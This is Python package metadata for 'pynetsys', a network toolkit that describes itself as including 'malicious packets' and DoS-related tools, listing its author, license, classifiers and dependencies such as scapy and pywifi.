Metadata-Version: 2.1
Name: pynetsys
Version: 0.1.6
Summary: pynetsys is a collection of tools and malicious packets.
Home-page: https://github.com/ANDRVV/pynetsys
Author: Andrea Vaccaro (ANDRVV)
License: BSD 3 License
Keywords: python,socket,threading,server,client,packet,packets,net,network,wireless,dos,tools,tool,traceroute,arp,tracert,arping,nslookup
Classifier: Development Status :: 1 - Planning
Classifier: Intended Audience :: Developers
Classifier: Programming Language :: Python :: 3
Classifier: Operating System :: Unix
Classifier: Operating System :: MacOS :: MacOS X
Classifier: Operating System :: Microsoft :: Windows
License-File: LICENSE
Requires-Dist: scapy
Requires-Dist: pywifi
Requires-Dist: dnspython
Requires-Dist: comtypes
